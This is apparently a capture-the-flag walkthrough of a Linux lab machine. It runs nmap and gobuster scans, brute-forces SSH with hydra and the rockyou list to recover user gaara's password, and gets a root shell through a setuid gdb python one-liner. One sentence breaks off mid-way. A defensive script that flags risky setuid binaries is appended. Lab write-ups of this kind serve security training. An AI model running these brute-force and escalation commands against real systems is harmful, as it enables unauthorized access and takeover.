Machine IP → 192.168.208.142
Nmap scan →
nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.208.142
OS Detection →
OS: Linux; CPE: cpe:/o:linux:linux_kernel
| Port | Service | Other details (if any) |
|------|---------|------------------------|
| 22 | SSH | OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.38 ((Debian)) |
GoBuster scan →
gobuster dir -u http://192.168.208.142 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
This did not reveal any useful information.
Using the image on the webpage as a reference, the username could be gaara. Therefore, hydra was used to brute-force the SSH server with the rockyou password list.
hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.208.142:22
This gives the password as iloveyou2, which subsequently yields the user flag.
Checking for setuid binaries reveals gdb as a setuid-root executable. The user is not present in the sudoers file. Therefore, it is essential to escalate using the
This is done as follows →
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
This grants the root shell and subsequently the root flag.
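
The setuid gdb finding above is what a routine host audit should catch. As an added example (not part of the original write-up), this script triages a list of setuid-root paths against a baseline; the EXPECTED and CODE_RUNNERS lists, the function names and the sample paths are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: triage setuid-root files against a baseline.
# Both lists are assumptions; tune them per distribution and host role.

# Setuid-root binaries assumed to be expected on the host.
EXPECTED="/usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/mount \
/usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd"

# Programs that run caller-supplied code by design (debuggers, interpreters).
# Setuid on any of these hands the file owner's privileges to every user.
CODE_RUNNERS="gdb python python2 python3 perl ruby php node lua"

# triage_suid: read one path per line on stdin and print "SEVERITY path"
# for every path that is not in the EXPECTED baseline.
triage_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        case " $EXPECTED " in
            *" $path "*) continue ;;      # known-good, stay quiet
        esac
        name=${path##*/}                  # basename
        base=${name%%.*}                  # python3.7 -> python3
        case " $CODE_RUNNERS " in
            *" $base "*) echo "HIGH $path" ;;
            *)           echo "REVIEW $path" ;;
        esac
    done
}

# Constructed sample standing in for the output of:
#   find / -xdev -type f -user root -perm -4000 2>/dev/null
sample_paths() {
    cat <<'EOF'
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/su
/opt/backup/helper
EOF
}

sample_paths | triage_suid
```

On a live host, pipe the find command from the comment into triage_suid; a HIGH hit such as gdb is cleared by removing the bit with chmod u-s on that file.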